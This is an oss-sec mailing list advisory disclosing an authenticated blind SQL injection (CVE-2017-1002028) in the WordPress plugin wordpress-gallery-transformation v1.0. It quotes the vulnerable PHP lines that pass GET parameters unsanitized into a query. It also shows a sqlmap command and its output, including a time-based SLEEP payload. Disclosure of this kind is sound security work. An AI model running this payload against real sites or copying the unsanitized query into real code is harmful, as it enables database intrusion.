oss-sec mailing list archives
Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Fri, 25 Aug 2017 12:03:02 -0400
Title: Authenticated Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2017-07-22 CVE-ID:[CVE-2017-1002028] Download Site: https://wordpress.org/plugins/wordpress-gallery-transformation/ Vendor: http://angrybyte.com Vendor Notified: 2017-08-07 Vendor Contact: plugins () wordpress org Advisory: http://www.vapidlabs.com/advisory.php?v=199 Description: Transforms word press into a gallery, wallpapers website, you name it. Vulnerability: SQL injection is in ./wordpress-gallery-transformation/gallery.php via $jpic parameter being unsanitized before being passed into an SQL query. -- 231- 232- $pfx=$wpdb->prefix; 233-dbcreator(); 234- if($_GET['picnj']){ 235- 236: $jpic=$_GET['picnj']; 237: $jnm=$_GET['nmj']; 238- $wpdb->query("update {$pfx}gallery set name='{$jnm}' where id=$jpic;"); 239- $wpdb->query("update {$pfx}gallery set rates=44"); 240- return 'ok?'; The attacker will need to be logged in and able to manage the gallery in order to exploit. Exploit Code: • $ sqlmap --load-cookies=./cookie -u 'http://example.com/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=*' --level 4 --risk 3 --dbms mysql • • • URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2556 HTTP(s) requests: • --- • Parameter: #1* (URI) • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: http://example.com:80/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE WHEN (4165=4165) THEN SLEEP(5) ELSE 4165 END) • --- • [13:16:53] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Ubuntu 16.04 (xenial) • web application technology: Apache 2.4.18 • back-end DBMS: MySQL >= 5.0.12 • [13:16:53] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 13:16:53
Current thread:
- Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0 Larry W. Cashdollar (Aug 25)